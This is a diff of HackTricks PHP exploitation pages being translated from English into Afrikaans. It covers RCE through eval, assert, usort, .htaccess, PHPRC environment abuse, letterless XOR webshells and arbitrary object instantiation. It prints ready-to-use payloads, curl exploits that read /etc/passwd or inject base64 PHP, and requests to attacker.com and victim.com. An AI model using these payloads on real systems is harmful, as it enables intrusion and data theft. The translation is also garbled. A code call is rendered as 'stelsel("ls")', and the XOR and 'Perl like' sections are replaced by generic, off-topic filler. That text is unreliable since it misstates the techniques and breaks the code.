+* Wanneer jy die **gebruikersname** van die gebruikers van die masjien het, kyk na die adres: **/\~\** om te sien of die php-direktorieë geaktiveer is.
+* [**LFI en RCE met behulp van php wrappers**](../../../pentesting-web/file-inclusion/) 
 
 ### password\_hash/password\_verify
 
-This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
-The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
-
+Hierdie funksies word tipies gebruik in PHP om **hassies van wagwoorde te genereer** en om te **kontroleer** of 'n wagwoord korrek is in vergelyking met 'n hassie.\
+Die ondersteunde algoritmes is: `PASSWORD_DEFAULT` en `PASSWORD_BCRYPT` (begin met `$2y$`). Let daarop dat **PASSWORD\_DEFAULT dikwels dieselfde as PASSWORD\_BCRYPT is**. En tans het **PASSWORD\_BCRYPT** 'n **groottebeperking in die inset van 72 byte**. Daarom, as jy iets groter as 72 byte met hierdie algoritme probeer hassie, sal slegs die eerste 72B gebruik word:
 ```php
 $cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
 False
@@ -195,34 +192,28 @@ False
 $cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
 True
 ```
+### HTTP-koppele om PHP-foute te misbruik
 
-### HTTP headers bypass abusing PHP errors
-
-If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\
-In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user):
+As 'n **PHP-bladsy foute druk en gebruikersinvoer terugvoer**, kan die gebruiker die PHP-bediener laat terugsit **inhoud wat lank genoeg is**, sodat wanneer dit probeer om die koppele by die antwoord te voeg, die bediener 'n fout sal gooi.\
+In die volgende scenario het die **aanvaller die bediener groot foute laat gooi**, en soos u kan sien op die skerm, kon PHP nie **die kopinligting wysig nie** (soos byvoorbeeld die CSP-kop is nie na die gebruiker gestuur nie):
 
 ![](<../../../.gitbook/assets/image (465).png>)
 
-## Code execution
+## Kode-uitvoering
 
-**system("ls");**\
+**stelsel("ls");**\
 **\`ls\`;**\
 **shell\_exec("ls");**
 
-[Check this for more useful PHP functions](php-useful-functions-disable\_functions-open\_basedir-bypass/)
-
-### **RCE via** **preg\_replace()**
-
+[Kyk hier vir meer nuttige PHP-funksies](php-useful-functions-disable\_functions-open\_basedir-bypass/)
 ```php
 preg_replace(pattern,replace,base)
 preg_replace("/a/e","phpinfo()","whatever")
 ```
-
-To execute the code in the "replace" argument is needed at least one match.\
-This option of preg\_replace has been **deprecated as of PHP 5.5.0.**
+Om die kode in die "vervang" argument uit te voer, is ten minste een ooreenstemming nodig.\
+Hierdie opsie van preg\_replace is **verouderd vanaf PHP 5.5.0.**
 
 ### **RCE via Eval()**
-
 ```
 '.system('uname -a'); $dummy='
 '.system('uname -a');#
@@ -230,27 +221,23 @@ This option of preg\_replace has been **deprecated as of PHP 5.5.0.**
 '.phpinfo().'
 
 ```
-
 ### **RCE via Assert()**
 
-This function within php allows you to **execute code that is written in a string** in order to **return true or false** (and depending on this alter the execution). Usually the user variable will be inserted in the middle of a string. For example:\
-`assert("strpos($_GET['page']),'..') === false")` --> In this case to get **RCE** you could do:
-
+Hierdie funksie binne php stel jou in staat om **kode uit te voer wat in 'n string geskryf is** om sodoende **waar of vals terug te gee** (en afhangend hiervan die uitvoering te verander). Gewoonlik word die gebruiker se veranderlike in die middel van 'n string ingevoeg. Byvoorbeeld:\
+`assert("strpos($_GET['page']),'..') === false")` --> In hierdie geval kan jy **RCE** verkry deur:
 ```
 ?page=a','NeVeR') === false and system('ls') and strpos('a
 ```
+Jy sal die kode se sintaks moet **breek**, jou **payload** byvoeg, en dit dan weer **regmaak**. Jy kan **logiese operasies** soos "**en**" of "%26%26" of "|" gebruik. Let daarop dat "of", "||" nie werk nie, want as die eerste voorwaarde waar is, sal ons payload nie uitgevoer word nie. Op dieselfde manier werk ";" nie, omdat ons payload nie uitgevoer sal word nie.
 
-You will need to **break** the code **syntax**, **add** your **payload**, and then **fix it again**. You can use **logic operations** such as "**and" or "%26%26" or "|"**. Note that "or", "||" doesn't work because if the first condition is true our payload won't get executed. The same way ";" doesn't work as our payload won't be executed.
+**Ander opsie** is om die uitvoering van die opdrag by die string te voeg: `'.highlight_file('.passwd').'`
 
-**Other option** is to add to the string the execution of the command: `'.highlight_file('.passwd').'`
-
-**Other option** (if you have the internal code) is to modify some variable to alter the execution: `$file = "hola"`
+**Ander opsie** (as jy die interne kode het) is om 'n sekere veranderlike te wysig om die uitvoering te verander: `$file = "hola"`
 
 ### **RCE via usort()**
 
-This function is used to sort an array of items using an specific function.\
-To abuse this function:
-
+Hierdie funksie word gebruik om 'n lys items te sorteer deur 'n spesifieke funksie te gebruik.\
+Om hierdie funksie te misbruik:
 ```php
 
 VALUE: );phpinfo();#
@@ -261,73 +248,69 @@ VALUE: );phpinfo();#
 ```php
 
 VALUE: );}[PHP CODE];#
 
 
 ```
+Jy kan ook **//** gebruik om die res van die kode te kommentaar.
 
-You can also use **//** to comment the rest of the code.
+Om die aantal hakies wat jy moet sluit te bepaal:
 
-To discover the number of parenthesis that you need to close:
-
-* `?order=id;}//`: we get an error message (`Parse error: syntax error, unexpected ';'`). We are probably missing one or more brackets.
-* `?order=id);}//`: we get a **warning**. That seems about right.
-* `?order=id));}//`: we get an error message (`Parse error: syntax error, unexpected ')' i`). We probably have too many closing brackets.
+* `?order=id;}//`: ons kry 'n foutboodskap (`Parse error: syntax error, unexpected ';'`). Ons mis waarskynlik een of meer hakies.
+* `?order=id);}//`: ons kry 'n **waarskuwing**. Dit lyk reg.
+* `?order=id));}//`: ons kry 'n foutboodskap (`Parse error: syntax error, unexpected ')' i`). Ons het waarskynlik te veel sluitende hakies.
 
 ### **RCE via .httaccess**
 
-If you can **upload** a **.htaccess**, then you can **configure** several things and even execute code (configuring that files with extension .htaccess can be **executed**).
+As jy 'n **.htaccess** kan **oplaai**, kan jy verskeie dinge instel en selfs kode uitvoer (deur te konfigureer dat lêers met die .htaccess-uitbreiding **uitgevoer** kan word).
 
-Different .htaccess shells can be found [here](https://github.com/wireghoul/htshells)
+Verskillende .htaccess-skulpe kan [hier](https://github.com/wireghoul/htshells) gevind word.
 
 ### RCE via Env Variables
 
-If you find a vulnerability that allows you to **modify env variables in PHP** (and another one to upload files, although with more research maybe this can be bypassed), you could abuse this behaviour to get **RCE**.
+As jy 'n kwesbaarheid vind wat jou in staat stel om **omgewingsveranderlikes in PHP te wysig** (en nog een om lêers op te laai, alhoewel dit dalk omseil kan word deur meer navorsing), kan jy hierdie gedrag misbruik om **RCE** te kry.
 
-* [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path): This env variable allows you load arbitrary libraries when executing other binaries (although in this case it might not work).
-* **`PHPRC`** : Instructs PHP on **where to locate its configuration file**, usually called `php.ini`. If you can upload your own config file, then, use `PHPRC` to point PHP at it. Add an **`auto_prepend_file`** entry specifying a second uploaded file. This second file contains normal **PHP code, which is then executed** by the PHP runtime before any other code.
-  1. Upload a PHP file containing our shellcode
-  2. Upload a second file, containing an **`auto_prepend_file`** directive instructing the PHP preprocessor to execute the file we uploaded in step 1
-  3.  Set the `PHPRC` variable to the file we uploaded in step 2.
-     * Get more info on how to execute this chain [**from the original report**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/).
-* **PHPRC** - another option
-  * If you **cannot upload files**, you could use in FreeBSD the "file" `/dev/fd/0` which contains the **`stdin`**, being the **body** of the request sent to the `stdin`:
-    * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
-  * Or to get RCE, enable **`allow_url_include`** and prepend a file with **base64 PHP code**:
-    * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
-  * Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845).
+* [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path): Hierdie omgewingsveranderlike stel jou in staat om arbitrêre biblioteke te laai wanneer jy ander binêre lêers uitvoer (alhoewel dit in hierdie geval dalk nie werk nie).
+* **`PHPRC`** : Gee PHP instruksies oor **waar om sy konfigurasie-lêer** te vind, wat gewoonlik `php.ini` genoem word. As jy jou eie konfigurasie-lêer kan oplaai, gebruik dan `PHPRC` om PHP daarheen te verwys. Voeg 'n **`auto_prepend_file`**-inskrywing by wat 'n tweede opgelaai lêer spesifiseer. Hierdie tweede lêer bevat normale **PHP-kode wat dan deur die PHP-uitvoeringstyd voor enige ander kode uitgevoer** word.
+1. Laai 'n PHP-lêer op wat ons skelkode bevat
+2. Laai 'n tweede lêer op wat 'n **`auto_prepend_file`**-riglyn bevat wat die PHP-voorverwerker instrueer om die lêer wat ons in stap 1 opgelaai het, uit te voer
+3. Stel die `PHPRC`-veranderlike in op die lêer wat ons in stap 2 opgelaai het.
+* Kry meer inligting oor hoe om hierdie ketting uit te voer [**uit die oorspronklike verslag**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/).
+* **PHPRC** - nog 'n opsie
+* As jy **nie lêers kan oplaai nie**, kan jy in FreeBSD die "lêer" `/dev/fd/0` gebruik wat die **`stdin`** bevat, wat die **liggaam** van die versoek wat na die `stdin` gestuur is, is:
+* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
+* Of om RCE te kry, aktiveer **`allow_url_include`** en voeg 'n lêer met **base64 PHP-kode** voor:
+* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
+* Tegniek [**uit hierdie verslag**](https://vulncheck.com/blog/juniper-cve-2023-36845).
 
-## PHP Static analysis
-
-Look if you can insert code in calls to these functions (from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):
+## PHP Statische analise
 
+Kyk of jy kode kan invoeg in oproepe na hierdie funksies (van [hier](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):
 ```php
 exec, shell_exec, system, passthru, eval, popen
 unserialize, include, file_put_cotents
 $_COOKIE | if #This mea
 ```
+As jy 'n PHP-toepassing aan die debug is, kan jy foutafdrukke globaal aktiveer in `/etc/php5/apache2/php.ini` deur `display_errors = On` by te voeg en Apache te herlaai: `sudo systemctl restart apache2`
 
-If yo are debugging a PHP application you can globally enable error printing in`/etc/php5/apache2/php.ini` adding `display_errors = On` and restart apache : `sudo systemctl restart apache2`
+### Ontkluwing van PHP-kode
 
-### Deobfuscating PHP code
+Jy kan die webwerf [www.unphp.net](http://www.unphp.net) gebruik om PHP-kode te ontkluur.
 
-You can use the **web**[ **www.unphp.net**](http://www.unphp.net) **to deobfuscate php code.**
+## PHP Wrappers & Protokolle
 
-## PHP Wrappers & Protocols
+PHP Wrappers en protokolle kan jou in staat stel om skryf- en leesbeskerming in 'n stelsel te omseil en dit te kompromitteer. Vir [meer inligting, besoek hierdie bladsy](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols).
 
-PHP Wrappers ad protocols could allow you to **bypass write and read protections** in a system and compromise it. For [**more information check this page**](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols).
+## Xdebug ongeagte RCE
 
-## Xdebug unauthenticated RCE
-
-If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
-
-## Variable variables
+As jy sien dat Xdebug geaktiveer is in 'n `phpconfig()` uitset, moet jy probeer om RCE te kry deur [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) te gebruik.
 
+## Veranderlike veranderlikes
 ```php
 $x = 'Da';
 $$x = 'Drums';
@@ -339,64 +322,62 @@ echo "${Da}"; //Drums
 echo "$x ${$x}"; //Da Drums
 echo "$x ${Da}"; //Da Drums
 ```
+## RCE misbruik van nuwe $\_GET\["a"]\($\_GET\["b"])
 
-## RCE abusing new $\_GET\["a"]\($\_GET\["b"])
-
-If in a page you can **create a new object of an arbitrary class** you might be able to obtain RCE, check the following page to learn how:
+As jy op 'n bladsy 'n **nuwe voorwerp van 'n willekeurige klas kan skep**, kan jy moontlik RCE verkry. Kyk na die volgende bladsy om te leer hoe:
 
 {% content-ref url="php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md" %}
 [php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md](php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md)
 {% endcontent-ref %}
 
-## Execute PHP without letters
+## Voer PHP uit sonder letters
 
 [https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/](https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/)
 
-### Using octal
-
+### Gebruik van oktaal
 ```php
 $_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);
 ```
-
 ### **XOR**
 
+XOR (Exclusive OR) is 'n logiese operasie wat gebruik word in kriptografie en rekenaarnetwerke. Dit is 'n bietjie-oor-bietjie operasie wat twee bietjiepatrone vergelyk en 'n nuwe bietjiepatroon genereer volgens 'n spesifieke reël.
+
+In kriptografie word XOR gebruik om data te versleutel en te ontsluit. Dit is 'n effektiewe manier om data te beskerm teen ongeoorloofde toegang. XOR kan ook gebruik word om data te versteek of te verberg.
+
+In rekenaarnetwerke word XOR gebruik om data te verifieer en te beskerm teen foutiewe oordrag. Dit kan gebruik word om data-integriteit te verseker en om te verseker dat data korrek oorgedra word.
+
+XOR is 'n nuttige tegniek wat in verskeie toepassings gebruik kan word. Dit is belangrik vir 'n hacker om die konsep van XOR te verstaan en hoe dit gebruik kan word in verskillende situasies.
 ```php
 $_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
 $__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
 $___=$__; #Could be not needed inside eval
 $_($___); #If ¢___ not needed then $_($__), show_source(.passwd)
 ```
+### XOR maklike skuldkode
 
-### XOR easy shell code
-
-According to [**this writeup** ](https://mgp25.com/ctf/Web-challenge/)the following it's possible to generate an easy shellcode this way:
-
+Volgens [**hierdie skryfstuk**](https://mgp25.com/ctf/Web-challenge/) is dit moontlik om 'n maklike skuldkode op hierdie manier te genereer:
 ```php
 $_="`{{{"^"?<>/"; // $_ = '_GET';
 ${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);
 
 $_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);
 ```
-
-So, if you can **execute arbitrary PHP without numbers and letters** you can send a request like the following abusing that payload to execute arbitrary PHP:
-
+So, as jy **arbitrêre PHP sonder syfers en letters kan uitvoer**, kan jy 'n versoek stuur soos die volgende om misbruik te maak van daardie payload om arbitrêre PHP uit te voer:
 ```
 POST: /action.php?_=system&__=cat+flag.php
 Content-Type: application/x-www-form-urlencoded
 
 comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);
 ```
+Vir 'n meer diepgaande verduideliking, kyk na [https://ctf-wiki.org/web/php/php/#preg\_match](https://ctf-wiki.org/web/php/php/#preg\_match)
 
-For a more in depth explanation check [https://ctf-wiki.org/web/php/php/#preg\_match](https://ctf-wiki.org/web/php/php/#preg\_match)
-
-### XOR Shellcode (inside eval)
-
+### XOR Shellcode (binne eval)
 ```bash
 #!/bin/bash
 
 if [[ -z $1 ]]; then
-  echo "USAGE: $0 CMD"
-  exit
+echo "USAGE: $0 CMD"
+exit
 fi
 
 CMD=$1
@@ -410,9 +391,63 @@ lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='
 ```php
 lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"
 ```
+### Perl soos
 
-### Perl like
+Perl is 'n kragtige skriptingtaal wat dikwels gebruik word vir webontwikkeling en stelseladministrasie. Dit bied 'n ryk stel funksies en biblioteke wat dit 'n gewilde keuse maak vir programmeerders. Hier is 'n paar Perl-truuks wat jy kan gebruik om jou webtoepassings te verbeter:
 
+#### Regulêre uitdrukkings
+
+Perl bied 'n kragtige regulêre uitdrukkingsbiblioteek wat dit maklik maak om te soek, vervang en manipuleer in teks. Jy kan dit gebruik om patrone in jou webinhoud te vind en te verander.
+
+```perl
+if ($string =~ /patroon/) {
+    # Doen iets as die patroon gevind word
+}
+```
+
+#### CGI-programmering
+
+Perl is baie gewild vir CGI-programmering, wat dit moontlik maak om dinamiese webinhoud te skep. Jy kan vormdata ontvang en verwerk, en dit gebruik om dinamiese webbladsye te genereer.
+
+```perl
+use CGI;
+
+my $cgi = CGI->new;
+my $name = $cgi->param('name');
+
+print $cgi->header;
+print "Hallo, $name!";
+```
+
+#### Databasisinteraksie
+
+Perl het 'n verskeidenheid databasisbiblioteke wat dit maklik maak om met databasisse te kommunikeer. Jy kan dit gebruik om data uit 'n databasis te haal, dit te wysig en nuwe data in te voeg.
+
+```perl
+use DBI;
+
+my $dbh = DBI->connect("DBI:mysql:database=naam;host=host", "gebruiker", "wagwoord");
+my $sth = $dbh->prepare("SELECT * FROM tabelle");
+$sth->execute;
+
+while (my $row = $sth->fetchrow_hashref) {
+    # Doen iets met die data
+}
+
+$dbh->disconnect;
+```
+
+#### Lêerhantering
+
+Perl bied 'n kragtige lêerhanteringsbiblioteek wat dit maklik maak om lêers te skep, te lees en te skryf. Jy kan dit gebruik om tekslêers te manipuleer of om lêers vanaf die bediener af te laai.
+
+```perl
+open(my $file, '>', 'lêernaam.txt');
+print $file "Inhoud van die lêer";
+close($file);
+```
+
+Hierdie is slegs 'n paar van die kragtige funksies wat Perl bied vir webontwikkeling. Deur hierdie truuks te gebruik, kan jy jou webtoepassings verbeter en meer doeltreffend maak.
 ```php
 
 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
index b857dbe21..8095440a5 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
@@ -1,42 +1,41 @@
-# PHP - RCE abusing object creation: new $\_GET\["a"]\($\_GET\["b"])
+# PHP - RCE misbruik van objek skepping: nuwe $\_GET\["a"]\($\_GET\["b"])
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS hack vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 

 
-This is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
+Hierdie is basies 'n opsomming van [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
 
-## Introduction
+## Inleiding
 
-The creation of new arbitrary objects, such as `new $_GET["a"]($_GET["a"])`, can lead to Remote Code Execution (RCE), as detailed in a [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). This document highlights various strategies for achieving RCE.
+Die skepping van nuwe willekeurige objekte, soos `new $_GET["a"]($_GET["a"])`, kan lei tot Remote Code Execution (RCE), soos in 'n [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) beskryf. Hierdie dokument beklemtoon verskeie strategieë om RCE te bereik.
 
-## RCE via Custom Classes or Autoloading
+## RCE via Aangepaste Klasse of Autoloading
 
-The syntax `new $a($b)` is used to instantiate an object where **`$a`** represents the class name and **`$b`** is the first argument passed to the constructor. These variables can be sourced from user inputs like GET/POST, where they may be strings or arrays, or from JSON, where they might present as other types.
-
-Consider the code snippet below:
+Die sintaksis `new $a($b)` word gebruik om 'n objek te instansieer waar **`$a`** die klasnaam verteenwoordig en **`$b`** die eerste argument is wat aan die konstrukteur oorgedra word. Hierdie veranderlikes kan afkomstig wees van gebruikersinsette soos GET/POST, waar hulle strings of rye kan wees, of van JSON, waar hulle as ander tipes kan voorkom.
 
+Beskou die onderstaande kodefragment:
 ```php
 class App {
-    function __construct ($cmd) {
-        system($cmd);
-    }
+function __construct ($cmd) {
+system($cmd);
+}
 }
 
 class App2 {
-    function App2 ($cmd) {
-        system($cmd);
-    }
+function App2 ($cmd) {
+system($cmd);
+}
 }
 
 $a = $_GET['a'];
@@ -44,85 +43,78 @@ $b = $_GET['b'];
 
 new $a($b);
 ```
+In hierdie geval, as `$a` ingestel word op `App` of `App2` en `$b` op 'n stelselopdrag (bv. `uname -a`), sal dit lei tot die uitvoering van daardie opdrag.
 
-In this instance, setting `$a` to `App` or `App2` and `$b` to a system command (e.g., `uname -a`) results in the execution of that command.
-
-**Autoloading functions** can be exploited if no such classes are directly accessible. These functions automatically load classes from files when needed and are defined using `spl_autoload_register` or `__autoload`:
-
+**Autoloading funksies** kan uitgebuit word as daar geen sulke klasse direk toeganklik is nie. Hierdie funksies laai outomaties klasse van lêers wanneer dit nodig is en word gedefinieer met behulp van `spl_autoload_register` of `__autoload`:
 ```php
 spl_autoload_register(function ($class_name) {
-    include './../classes/' . $class_name . '.php';
+include './../classes/' . $class_name . '.php';
 });
 
 function __autoload($class_name) {
-    include $class_name . '.php';
+include $class_name . '.php';
 };
 
 spl_autoload_register();
 ```
+Die gedrag van outoloading verskil met PHP-weergawes en bied verskillende RCE-moontlikhede.
 
-The behavior of autoloading varies with PHP versions, offering different RCE possibilities.
+## RCE via Ingeboude Klasse
 
-## RCE via Built-In Classes
+As daar nie aangepaste klasse of outoloaders is nie, kan **ingeboude PHP-klasse** voldoende wees vir RCE. Die aantal van hierdie klasse wissel tussen 100 en 200, gebaseer op die PHP-weergawe en uitbreidings. Hulle kan gelys word deur gebruik te maak van `get_declared_classes()`.
 
-Lacking custom classes or autoloaders, **built-in PHP classes** may suffice for RCE. The number of these classes ranges between 100 to 200, based on PHP version and extensions. They can be listed using `get_declared_classes()`.
+Konstruksies van belang kan geïdentifiseer word deur die refleksie API, soos getoon in die volgende voorbeeld en die skakel [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF).
 
-Constructors of interest can be identified through the reflection API, as shown in the following example and the link [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF).
+**RCE via spesifieke metodes sluit in:**
 
-**RCE via specific methods includes:**
-
-### **SSRF + Phar Deserialization**
-
-The `SplFileObject` class enables SSRF through its constructor, allowing connections to any URL:
+### **SSRF + Phar Deserialisering**
 
+Die `SplFileObject`-klas maak SSRF moontlik deur middel van sy konstrukteur, wat verbinding met enige URL toelaat:
 ```php
 new SplFileObject('http://attacker.com/');
 ```
+SSRF kan lei tot deserialisasie-aanvalle in weergawes van PHP voor 8.0 deur die gebruik van die Phar-protokol.
 
-SSRF can lead to deserialization attacks in versions of PHP before 8.0 using the Phar protocol.
-
-### **Exploiting PDOs**
-
-The PDO class constructor allows connections to databases via DSN strings, potentially enabling file creation or other interactions:
+### **Uitbuiting van PDO's**
 
+Die konstrukteur van die PDO-klas maak dit moontlik om verbinding met databasisse te maak deur middel van DSN-reekse, wat potensieel die skep van lêers of ander interaksies moontlik maak:
 ```php
 new PDO("sqlite:/tmp/test.txt")
 ```
-
 ### **SoapClient/SimpleXMLElement XXE**
 
-Versions of PHP up to 5.3.22 and 5.4.12 were susceptible to XXE attacks through the `SoapClient` and `SimpleXMLElement` constructors, contingent on the version of libxml2.
+Weergawes van PHP tot 5.3.22 en 5.4.12 was vatbaar vir XXE-aanvalle deur die `SoapClient` en `SimpleXMLElement` konstruksies, afhangende van die weergawe van libxml2.
 
-## RCE via Imagick Extension
+## RCE via Imagick-uitbreiding
 
-In the analysis of a **project's dependencies**, it was discovered that **Imagick** could be leveraged for **command execution** by instantiating new objects. This presents an opportunity for exploiting vulnerabilities.
+In die analise van 'n projek se afhanklikhede is ontdek dat Imagick gebruik kan word vir beveluitvoering deur nuwe objekte te instansieer. Dit bied 'n geleentheid vir die uitbuiting van kwesbaarhede.
 
-### VID parser
+### VID-parser
 
-The VID parser capability of writing content to any specified path in the filesystem was identified. This could lead to the placement of a PHP shell in a web-accessible directory, achieving Remote Code Execution (RCE).
+Die VID-parser-vermoë om inhoud na enige gespesifiseerde pad in die lêersisteem te skryf, is geïdentifiseer. Dit kan lei tot die plasing van 'n PHP-skulp in 'n web-toeganklike gids, wat Remote Code Execution (RCE) bereik.
 
-#### VID Parser + File Upload
+#### VID-parser + Lêeroplaai
 
-It's noted that PHP temporarily stores uploaded files in `/tmp/phpXXXXXX`. The VID parser in Imagick, utilizing the **msl** protocol, can handle wildcards in file paths, facilitating the transfer of the temporary file to a chosen location. This method offers an additional approach to achieve arbitrary file writing within the filesystem.
+Dit moet opgemerk word dat PHP opgelaaide lêers tydelik in `/tmp/phpXXXXXX` stoor. Die VID-parser in Imagick, wat die **msl**-protokol gebruik, kan wildcards in lêer-paaie hanteer, wat die oordrag van die tydelike lêer na 'n gekose plek fasiliteer. Hierdie metode bied 'n addisionele benadering om arbitrêre lêerskryf binne die lêersisteem te bereik.
 
 ### PHP Crash + Brute Force
